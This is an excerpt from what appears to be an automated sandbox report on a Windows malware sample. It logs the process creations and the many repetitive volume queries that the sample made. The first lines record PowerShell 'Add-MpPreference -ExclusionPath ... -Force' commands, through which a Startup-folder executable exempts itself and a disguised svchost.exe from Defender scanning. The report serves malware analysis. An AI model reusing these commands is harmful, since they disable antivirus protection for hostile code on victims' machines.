Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeQueries volume information: C:\Users\user\AppData\Roaming\CTF loader_es.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeQueries volume information: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
